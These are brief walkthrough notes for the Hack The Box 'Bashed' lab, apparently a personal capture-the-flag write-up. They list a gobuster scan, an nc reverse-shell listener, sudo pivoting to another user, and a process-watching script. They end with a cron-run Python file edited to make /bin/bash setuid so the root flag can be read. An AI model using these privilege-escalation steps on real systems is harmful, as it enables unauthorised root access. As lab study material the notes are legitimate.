Bashed - Hack The Box
Reconnaissance
- Gobuster
gobuster dir -u http://10.10.10.68/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Exploitation
- Send reverse shell
nc -nlvp 9000
Post-exploitation
- List sudoers
sudo -l
We can execute commands with scriptmanager user
- User Pivoting
sudo -u scriptmanager bash
- Find scriptmanager files
find / -user scriptmanager 2>/dev/null | grep -vE "proc"
- FInd crontabs with bash script
#!/bin/bash
old_process=$(ps -eo user,command)
echo -e "[+] Listing new commands...\n\n"
while true;do
new_process=$(ps -eo user,command)
diff <(echo "$old_process") <(echo "$new_process") | grep "[\>\<]" | grep -vE "procmon|kworker"
old_process=$new_process
done
- Change test.py script
import os
os.system("chmod u+s /bin/bash")
ls -l /bin/bash
bash -p
cat /root/root.txt
